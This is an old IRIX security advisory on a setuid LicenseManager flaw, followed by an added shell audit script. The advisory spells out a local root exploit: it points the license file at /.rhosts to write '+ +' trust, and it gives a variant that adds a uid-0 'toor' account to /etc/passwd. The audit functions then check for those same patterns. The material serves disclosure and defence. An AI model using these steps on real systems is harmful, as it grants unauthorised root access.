COMMAND
/usr/etc/LicenseManager (FLEXlm license subsystem)
SYSTEMS AFFECTED
IRIX 5.3, IRIX 6.0
PROBLEM
The LicenseManager program and the FLEXlm license subsystem handle
software licensing. An account on the vulnerable system is required
to exploit the problem. With an account, these vulnerabilities are
exploitable through both local and remote access.
A new, fast, reliable way to get root on your local SGI is given
below. It works on Irix 5.3, 6.2 and 6.3 with
license_eoe.sw.license_eoe installed. IRIX doesn't seem to
have it.
This exploit was made possible by developers who make big, fat
programs like LicenseManager suid.
LicenseManager is a GUI to the license subsystem. It allows one to
install/remove/update FLEXlm and NET_LS licenses. Any regular user
with access to an X screen can run it, and it's suid. It will allow
anyone to install licenses, and will prompt for the root password if
one wants to remove one. And that's about all the protection it has.
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &
Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in the License version field you can put a space)
Apply
License(s) succesfully installed
% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +
If your system has remote root logins disabled, replacing
/.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh will
be helpful. Credit for this goes to Yuri Volobuev.
SOLUTION
The solution to this problem is to install version 3.0 of the
License Tools, license_eoe subsystem. To determine the version of
License Tools installed on a particular system, the following
command can be used:
% versions license_eoe
or,
chmod -s /usr/etc/LicenseManager
or,
get a new release that fixes this problem.
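As an added audit helper (not part of the original advisory), the POSIX sh functions below check for the conditions the advisory describes: the setuid bit on /usr/etc/LicenseManager that the SOLUTION's chmod -s removes, wildcard "+ +" entries or the "#:#" license header left in an rhosts-style file, and extra uid-0 accounts such as the "toor" line in a passwd-style file. File paths are passed as arguments so the checks can also run on copied files; the function names and any sample input are constructed for this example.

```shell
#!/bin/sh
# Added audit helper, not part of the original advisory.
# Real paths from the advisory: /usr/etc/LicenseManager, /.rhosts, /etc/passwd.
# Paths are passed as arguments so the checks can also run on copied files.

# Exit 0 and report if the binary still carries the setuid bit
# (the SOLUTION's "chmod -s" removes it).
check_suid() {
    bin=$1
    if [ -u "$bin" ]; then
        echo "FINDING: $bin is setuid; run chmod -s until license_eoe 3.0 is installed"
        return 0
    fi
    return 1
}

# Exit 0 and report lines in an rhosts-style file that either trust any
# host ("+", "+ +", "+ user") or carry the "#:#" license header the
# advisory shows LicenseManager writing ahead of the "+ +" line.
check_rhosts() {
    f=$1
    [ -r "$f" ] || return 1
    found=1
    while IFS= read -r line || [ -n "$line" ]; do
        # collapse runs of blanks so "+   +" is still recognised
        norm=$(printf '%s' "$line" | tr -s ' \t' ' ' | sed 's/^ //; s/ $//')
        case "$norm" in
            '+'|'+ '*|'#:#'*) echo "FINDING: $f: $line"; found=0 ;;
        esac
    done < "$f"
    return $found
}

# Exit 0 and report every account other than root whose uid is 0
# (the advisory's "toor:0:0::/:/bin/sh" line is exactly this case).
check_uid0() {
    f=$1
    [ -r "$f" ] || return 1
    hits=$(awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$f")
    [ -n "$hits" ] || return 1
    for u in $hits; do
        echo "FINDING: $f: uid 0 account '$u'"
    done
    return 0
}
```

Source the file and call check_suid /usr/etc/LicenseManager, check_rhosts /.rhosts and check_uid0 /etc/passwd; each function exits 0 only when it has something to report.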